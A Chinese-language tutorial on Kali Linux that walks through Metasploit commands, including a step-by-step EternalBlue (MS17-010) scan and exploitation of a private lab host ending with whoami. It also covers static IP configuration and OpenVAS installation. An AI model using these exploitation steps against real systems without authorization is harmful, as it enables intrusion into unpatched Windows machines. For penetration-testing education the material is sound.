Kali Linux - Metasploit 使用方法

1.更新metasploit版本
apt-get update
apt-get install metasploit-framework

2.開啟Metasploit
msfconsole

3.常用指令說明
help：檢視執行指令的資訊
search module：搜尋特定模組
use module：載入特定模組
info：查訊目前使用模組的資訊
options：查看需要設定的參數
set option module：設定模組內的參數
check：測試
run：執行滲透攻擊模組
back：回到上層

範例 - 攻擊Microsoft的MS17_010漏洞

search ms17_010

a.大範圍搜索攻擊目標
use auxiliary/scanner/smb/smb_ms17_010
options
set RHOSTS 192.168.33.1/24
set THREADS 16
run

 

b.攻擊特定目標
use exploit/windows/smb/ms17_010_eternalblue
options
set RHOST 192.168.33.106
RUN

c.滲透成功
ipconfig
whoami

Kali Linux 設定IP

1.修改 /etc/network/interfaces 內容
root@kali~#nano /etc/network/interfaces

2.設定使用模式

★DHCP(自動取得IP)
auto eth0
iface eth0 inet dhcp

★Static IP(固定IP)
auto eth0
iface eth0 inet static
address 192.168.1.100  # IP位址
netmask 255.255.255.0  # 子網路遮罩
gateway 192.168.1.254  # 預設閘道

3.重新啟動網路或重開機
root@kali~#sudo /etc/init.d/networking restart #重啟網路
root@kali~#ifdown eth0 && ifup eth0  #重啟網路介面卡
root@kali~#reboot #重新開機

Kali Linux 安裝OpenVAS

下載VirtualBox及安裝
https://www.virtualbox.org/wiki/Downloads
下載Kali Linux Image並安裝在VirtualBox內
https://www.kali.org/downloads/

1.安裝好Kali Linux後，修改鏡像源定義文件
nano /etc/apt/sources.list
清空文件内所有内容及添加
deb http://http.kali.org/kali kali-rolling main contrib non-free
CTRL+O 確認並存檔
CTRL+X 退出

2、更新
apt-get update
apt-get upgrade
apt-get dist-upgrade

3、安裝OpenVAS
apt-get install openvas  #安裝OpenVAS
openvas-setup #自動設定環境、下載憑證及定義檔
openvas-check-setup  #檢查安裝
openvasmd --create-user admin1  #建立帳號
openvasmd --user=admin1 --new-password=openvas #更改密碼
openvas-feed-update　#升级
openvas-stop
openvasmd --rebuild
openvas-start
netstat -tlnp  #確認9390跟9392兩個port已在LISTEN狀態
https://127.0.0.1:9392 (在Kali開啟瀏覽器，輸入IP打開操作介面)

PS.每次重開機需要執行底下指令(OpenVAS的bug)
openvas-stop
openvasmd --rebuild
openvas-start